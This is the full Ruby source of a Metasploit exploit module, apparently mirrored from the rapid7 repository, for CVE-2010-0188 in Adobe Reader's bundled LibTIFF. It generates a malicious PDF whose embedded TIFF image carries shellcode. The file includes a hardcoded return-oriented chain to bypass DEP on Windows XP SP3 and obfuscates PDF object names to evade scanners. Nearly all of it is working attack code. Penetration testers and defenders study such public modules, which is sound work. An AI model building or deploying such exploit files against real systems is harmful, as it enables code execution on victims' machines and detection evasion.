CoCalc -- adobe_libtiff.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/adobe_libtiff.rb
¹⁹⁵⁹¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'zlib'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = GoodRanking
10

11
  include Msf::Exploit::FILEFORMAT
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Adobe Acrobat Bundled LibTIFF Integer Overflow',
18
        'Description' => %q{
19
          This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat
20
          Professional versions 8.0 through 8.2 and 9.0 through 9.3.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [
24
          'Microsoft', # reported to Adobe
25
          'villy <villys777[at]gmail.com>', # public exploit
26
          # Metasploit version by:
27
          'jduck'
28
        ],
29
        'References' => [
30
          [ 'CVE', '2010-0188' ],
31
          [ 'BID', '38195' ],
32
          [ 'OSVDB', '62526' ],
33
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-07.html' ],
34
          [ 'URL', 'http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76' ],
35
          [ 'URL', 'http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html' ]
36
        ],
37
        'DefaultOptions' => {
38
          'EXITFUNC' => 'process',
39
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
40
          'DisablePayloadHandler' => true
41
        },
42
        'Payload' => {
43
          'Space' => 1024,
44
          'BadChars' => "\x00",
45
          'DisableNops'	=> true
46
        },
47
        'Platform' => 'win',
48
        'Targets' => [
49
          # test results (on Windows XP SP3)
50
          # reader 6.0.1 - untested
51
          # reader 7.0.5 - untested
52
          # reader 7.0.8 - untested
53
          # reader 7.0.9 - untested
54
          # reader 7.1.0 - untested
55
          # reader 7.1.1 - untested
56
          # reader 8.0.0 - untested
57
          # reader 8.1.1 - untested
58
          # reader 8.1.2 - untested
59
          # reader 8.1.3 - untested
60
          # reader 8.1.4 - untested
61
          # reader 8.1.5 - untested
62
          # reader 8.1.6 - untested
63
          # reader 8.2.0 - untested
64
          # reader 9.0.0 - untested
65
          # reader 9.1.0 - untested
66
          # reader 9.2.0 - untested
67
          # reader 9.3.0 - works
68
          [
69
            'Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)',
70
            {
71
              # ew, hardcoded offsets - see make_tiff()
72
            }
73
          ],
74
        ],
75
        'DisclosureDate' => '2010-02-16',
76
        'DefaultTarget' => 0,
77
        'Notes' => {
78
          'Reliability' => UNKNOWN_RELIABILITY,
79
          'Stability' => UNKNOWN_STABILITY,
80
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
81
        }
82
      )
83
    )
84

85
    register_options(
86
      [
87
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
88
      ]
89
    )
90
  end
91

92
  def exploit
93
    tiff_data = make_tiff(payload.encoded)
94
    xml_data = make_xml(tiff_data)
95
    compressed = Zlib::Deflate.deflate(xml_data)
96

97
    # Create the pdf
98
    pdf = make_pdf(compressed)
99

100
    print_status("Creating '#{datastore['FILENAME']}' file...")
101

102
    file_create(pdf)
103
  end
104

105
  def random_non_ascii_string(count)
106
    result = ""
107
    count.times do
108
      result << (rand(128) + 128).chr
109
    end
110
    result
111
  end
112

113
  def io_def(id)
114
    "%d 0 obj\r\n" % id
115
  end
116

117
  def io_ref(id)
118
    "%d 0 R" % id
119
  end
120

121
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
122
  def n_obfu(str)
123
    result = ""
124
    str.scan(/./u) do |c|
125
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
126
        result << "#%x" % c.unpack("C*")[0]
127
      else
128
        result << c
129
      end
130
    end
131
    result
132
  end
133

134
  def ascii_hex_whitespace_encode(str)
135
    result = ""
136
    whitespace = ""
137
    str.each_byte do |b|
138
      result << whitespace << "%02x" % b
139
      whitespace = " " * (rand(3) + 1)
140
    end
141
    result << ">"
142
  end
143

144
  def make_pdf(xml_data)
145
    xref = []
146
    eol = "\x0d\x0a"
147
    endobj = "endobj" << eol
148

149
    pdf = "%PDF-1.5" << eol
150
    pdf << "%" << random_non_ascii_string(4) << eol
151

152
    xref << pdf.length
153
    pdf << io_def(1) << n_obfu("<</Filter/FlateDecode/Length ") << xml_data.length.to_s << n_obfu("/Type /EmbeddedFile>>") << eol
154
    pdf << "stream" << eol
155
    pdf << xml_data << eol
156
    pdf << eol << "endstream" << eol
157
    pdf << endobj
158

159
    xref << pdf.length
160
    pdf << io_def(2) << n_obfu("<</V () /Kids [") << io_ref(3) << n_obfu("] /T (") << "topmostSubform[0]" << n_obfu(") >>") << eol << endobj
161

162
    xref << pdf.length
163
    pdf << io_def(3) << n_obfu("<</Parent ") << io_ref(2) << n_obfu(" /Kids [") << io_ref(4) << n_obfu("] /T (") << "Page1[0]" << n_obfu(")>>")
164
    pdf << eol << endobj
165

166
    xref << pdf.length
167
    pdf << io_def(4) << n_obfu("<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P ") << io_ref(5)
168
    pdf << n_obfu("/FT /Btn/TU (") << "ImageField1" << n_obfu(")/Ff 65536/Parent ") << io_ref(3)
169
    pdf << n_obfu("/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (") << "ImageField1[0]" << n_obfu(")/Rect [107.385 705.147 188.385 709.087]>>")
170
    pdf << eol << endobj
171

172
    xref << pdf.length
173
    pdf << io_def(5) << n_obfu("<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent ")
174
    pdf << io_ref(6) << n_obfu("/Type /Page/PieceInfo null>>")
175
    pdf << eol << endobj
176

177
    xref << pdf.length
178
    pdf << io_def(6) << n_obfu("<</Kids [") << io_ref(5) << n_obfu("]/Type /Pages/Count 1>>")
179
    pdf << eol << endobj
180

181
    xref << pdf.length
182
    pdf << io_def(7) << ("<</PageMode /UseAttachments/Pages ") << io_ref(6)
183
    pdf << ("/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm ") << io_ref(8)
184
    pdf << ("/Type /Catalog>>")
185
    pdf << eol << endobj
186

187
    xref << pdf.length
188
    pdf << io_def(8) << n_obfu("<</DA (/Helv 0 Tf 0 g )/XFA [(template) ") << io_ref(1) << n_obfu("]/Fields [")
189
    pdf << io_ref(2) << n_obfu("]>>")
190
    pdf << endobj << eol
191

192
    xrefPosition = pdf.length
193
    pdf << "xref" << eol
194
    pdf << "0 %d" % (xref.length + 1) << eol
195
    pdf << "0000000000 65535 f" << eol
196
    xref.each do |index|
197
      pdf << "%010d 00000 n" % index << eol
198
    end
199
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(7) << ">>" << eol
200
    pdf << "startxref" << eol
201
    pdf << xrefPosition.to_s() << eol
202
    pdf << "%%EOF"
203
  end
204

205
  def make_tiff(code)
206
    tiff_offset = 0x2038
207
    shellcode_offset = 1500
208

209
    tiff = "II*\x00"
210
    tiff << [tiff_offset].pack('V')
211
    tiff << make_nops(shellcode_offset)
212
    tiff << code
213

214
    # Padding
215
    tiff << rand_text_alphanumeric(tiff_offset - 8 - code.length - shellcode_offset)
216

217
    tiff << "\x07\x00\x00\x01\x03\x00\x01\x00"
218
    tiff << "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
219
    tiff << "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
220
    tiff << "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
221
    tiff << "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
222
    tiff << "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
223
    tiff << "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00"
224

225
    # The following executes a ret2lib using BIB.dll
226
    # The effect is to bypass DEP and execute the shellcode in an indirect way
227
    stack_data = [
228
      0x70072f7,      # pop eax / ret
229
      0x10104,
230
      0x70015bb,      # pop ecx / ret
231
      0x1000,
232
      0x700154d,      # mov [eax], ecx / ret
233
      0x70015bb,      # pop ecx / ret
234
      0x7ffe0300,     # -- location of KiFastSystemCall
235
      0x7007fb2,      # mov eax, [ecx] / ret
236
      0x70015bb,      # pop ecx / ret
237
      0x10011,
238
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
239
      0x70015bb,      # pop ecx / ret
240
      0x10100,
241
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
242
      0x70072f7,      # pop eax / ret
243
      0x10011,
244
      0x70052e2,      # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
245
      0x7005c54,      # pop esi / add esp,0x14 / ret
246
      0xffffffff,
247
      0x10100,
248
      0x0,
249
      0x10104,
250
      0x1000,
251
      0x40,
252
      # The next bit effectively copies data from the interleaved stack to the memory
253
      # pointed to by eax
254
      # The data copied is:
255
      # \x5a\x52\x6a\x02\x58\xcd\x2e\x3c\xf4\x74\x5a\x05\xb8\x49\x49\x2a
256
      # \x00\x8b\xfa\xaf\x75\xea\x87\xfe\xeb\x0a\x5f\xb9\xe0\x03\x00\x00
257
      # \xf3\xa5\xeb\x09\xe8\xf1\xff\xff\xff\x90\x90\x90\xff\xff\xff\x90
258
      0x700d731,      # mov eax, [ebp-0x24] / ret
259
      0x70015bb,      # pop ecx / ret
260
      0x26a525a,
261
      0x700154d,      # mov [eax], ecx / ret
262
      0x700a722,      # add eax, 4 / ret
263
      0x70015bb,      # pop ecx / ret
264
      0x3c2ecd58,
265
      0x700154d,      # mov [eax], ecx / ret
266
      0x700a722,      # add eax, 4 / ret
267
      0x70015bb,      # pop ecx / ret
268
      0xf4745a05,
269
      0x700154d,      # mov [eax], ecx / ret
270
      0x700a722,      # add eax, 4 / ret
271
      0x70015bb,      # pop ecx / ret
272
      0x2a4949b8,
273
      0x700154d,      # mov [eax], ecx / ret
274
      0x700a722,      # add eax, 4 / ret
275
      0x70015bb,      # pop ecx / ret
276
      0xaffa8b00,
277
      0x700154d,      # mov [eax], ecx / ret
278
      0x700a722,      # add eax, 4 / ret
279
      0x70015bb,      # pop ecx / ret
280
      0xfe87ea75,
281
      0x700154d,      # mov [eax], ecx / ret
282
      0x700a722,      # add eax, 4 / ret
283
      0x70015bb,      # pop ecx / ret
284
      0xb95f0aeb,
285
      0x700154d,      # mov [eax], ecx / ret
286
      0x700a722,      # add eax, 4 / ret
287
      0x70015bb,      # pop ecx / ret
288
      0x3e0,
289
      0x700154d,      # mov [eax], ecx / ret
290
      0x700a722,      # add eax, 4 / ret
291
      0x70015bb,      # pop ecx / ret
292
      0x9eba5f3,
293
      0x700154d,      # mov [eax], ecx / ret
294
      0x700a722,      # add eax, 4 / ret
295
      0x70015bb,      # pop ecx / ret
296
      0xfffff1e8,
297
      0x700154d,      # mov [eax], ecx / ret
298
      0x700a722,      # add eax, 4 / ret
299
      0x70015bb,      # pop ecx / ret
300
      0x909090ff,
301
      0x700154d,      # mov [eax], ecx / ret
302
      0x700a722,      # add eax, 4 / ret
303
      0x70015bb,      # pop ecx / ret
304
      0x90ffffff,
305
      0x700154d,      # mov [eax], ecx / ret
306
      0x700d731,      # mov eax, [ebp-0x24] / ret
307
      0x700112f       # call eax -- (execute stub to transition to full shellcode)
308
    ].pack('V*')
309

310
    tiff << stack_data
311

312
    Rex::Text.encode_base64(tiff)
313
  end
314

315
  def make_xml(tiff_data)
316
    xml_data = <<~EOS
317
      <?xml version="1.0" encoding="UTF-8" ?>
318
      <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
319
      <config xmlns="http://www.xfa.org/schema/xci/1.0/">
320
      <present>
321
      <pdf>
322
      <version>1.65</version>
323
      <interactive>1</interactive>
324
      <linearized>1</linearized>
325
      </pdf>
326
      <xdp>
327
      <packets>*</packets>
328
      </xdp>
329
      <destination>pdf</destination>
330
      </present>
331
      </config>
332
      <template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
333
      <subform name="topmostSubform" layout="tb" locale="en_US">
334
      <pageSet>
335
      <pageArea id="PageArea1" name="PageArea1">
336
      <contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
337
      <medium short="612pt" long="792pt" stock="custom" />
338
      </pageArea>
339
      </pageSet>
340
      <subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
341
      <break before="pageArea" beforeTarget="#PageArea1" />
342
      <bind match="none" />
343
      <field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
344
      <ui>
345
      <imageEdit />
346
      </ui>
347
      </field>
348
      <?templateDesigner expand 1?>
349
      </subform>
350
      <?templateDesigner expand 1?>
351
      </subform>
352
      <?templateDesigner FormTargetVersion 24?>
353
      <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
354
      <?templateDesigner Zoom 94?>
355
      </template>
356
      <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
357
      <xfa:data>
358
      <topmostSubform>
359
      <ImageField1 xfa:contentType="image/tif" href="">REPLACE_TIFF</ImageField1>
360
      </topmostSubform>
361
      </xfa:data>
362
      </xfa:datasets>
363
      <PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
364
      <form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
365
      <subform name="topmostSubform">
366
      <instanceManager name="_Page1" />
367
      <subform name="Page1">
368
      <field name="ImageField1" />
369
      </subform>
370
      <pageSet>
371
      <pageArea name="PageArea1" />
372
      </pageSet>
373
      </subform>
374
      </form>
375
      </xdp:xdp>
376
    EOS
377
    xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
378

379
    xml_data
380
  end
381
end
382

383
Product

Resources

Company
